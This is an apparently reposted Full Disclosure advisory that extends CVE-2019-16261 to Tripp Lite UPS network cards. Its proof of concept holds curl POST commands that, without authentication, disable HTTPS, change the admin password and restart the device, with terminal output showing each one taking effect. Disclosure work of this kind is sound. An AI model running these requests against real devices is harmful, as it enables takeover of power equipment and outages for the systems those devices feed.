CVE-2019-16261 (UPDATE): Unauthenticated POST requests to Tripp Lite UPS Systems
这篇文章揭示了Tripp Lite UPS和PDU设备中的一个关键安全漏洞(CVE-2019-16261),允许未认证用户通过POST请求控制设备功能,包括更改密码和断开电源。该漏洞影响多个型号,并已被修复。建议升级固件以缓解风险。 2025-3-20 12:17:6 Author: seclists.org(查看原文) 阅读量:7 收藏
fulldisclosure logo

Full Disclosure mailing list archives

From: Lucas Lalumière <lucas.lalum () gmail com>
Date: Mon, 17 Mar 2025 10:37:52 -0400
[Author]: Lucas Lalumiere
[Contact]: lucas.lalum () gmail com
[Date]: 2025-3-17
[Vendor]: Tripp Lite
[Product]: SU750XL UPS
[Firmware]: 12.04.0052
[CVE Reference]: CVE-2019-16261

============================
Affected Products (Tested):
============================
- Tripp Lite PDU's (e.g., PDUMH15AT)
- Tripp Lite UPS's (e.g., SU750XL)   *NEW*

======================
Vulnerability Summary:
======================
CVE-2019-16261 describes a critical vulnerability in the Tripp Lite
PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send
POST requests to the `/Forms/` directory to:
- Change admin or manager passwords
- Shut off power to an outlet
- Disable/enable services

Through my own experimentation, I have discovered that this vulnerability
is also effective on Tripp Lite UPS systems, including my Tripp Lite
SU750XL, and applies to firmware 12.04.0052. This suggests the issue
extends beyond just PDUs, as mentionned in the CVE, to the network cards
equipped in Tripp Lite PDU's and UPS's (like my SNMPWEBCARD55) with
vulnerable firmware versions 12.04.0053 and below.

=========================
Proof of Concept (PoC):
=========================
These curl commands, similar to those provided originally by Jim Becher's
blog, are among those I've tested on the SU750XL.

1. Turning off Services (like HTTPS):
```
curl -X POST -d
"netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes"
http://[DEVICE_IP]/Forms/network_web_1

curl -X POST -d "startreset=Restart+PowerAlert" http://
[DEVICE_IP]/Forms/requestreset_1
```

Result (PowerAlert terminal):
```
    System settings were changed.
    Initiating system shutdown procedure ... complete.
    The system is restarting now.

    ...

    SERVICES:
    HTTP    is enabled  on port 80
    HTTPS   is disabled on port 443
    SSH     is enabled  on port 22
    TELNET  is enabled  on port 23
    FTP     is enabled  on port 21
    SYSLOG  is enabled
```

2. Change Admin Password
```
curl -X POST -d
"securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes"
http://[DEVICE_IP]/Forms/system_security_1

curl -X POST -d "startreset=Restart+PowerAlert" http://
[DEVICE_IP]/Forms/requestreset_1
```

Result (PowerAlert terminal):
```
    System settings were changed.
    Initiating system shutdown procedure ... complete.
    The system is restarting now.

    ...

    Login: newadmin
    Password: *****
    Logged in as user newadmin
    $ _
```

=======
Impact:
=======
- High Availability Impact: Attackers can remotely control power functions,
affecting critical systems connected to PDU/UPS'.
- High Confidentiality Impact: Attackers can obtain admin access to any of
the device's information via changing credentials.
- High Integrity Impact: Attackers, if not through the POST requests, can
modify any configuration by using modified admin credentials.

===============
Exploit Status:
===============
This vulnerability has already been patched in newer network card firmware
versions and acknowledged by Eaton. It was previously reported in
CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDU's.

=======================
Recommended Mitigation:
=======================
Upgrade webcard firmware to the newest version. You can find the download
here:
 - https://tripplite.eaton.com/support/downloads?type=software&subtype=32

===========
References:
===========
- Original discovery:
https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits
- CVE-2019-16261:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261

====================
Discoverer/Credits:
====================
 - Jim Becher, 2019-08-19

This disclosure is being submitted to expand upon the original CVE report,
adding additional affected products and detail. My find confirms that both
Tripp Lite UPS and PDU devices equipped with optional network cards (e,g.
SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • CVE-2019-16261 (UPDATE): Unauthenticated POST requests to Tripp Lite UPS Systems Lucas Lalumière (Mar 20)

文章来源: https://seclists.org/fulldisclosure/2025/Mar/1
如有侵权请联系:admin#unsafe.sh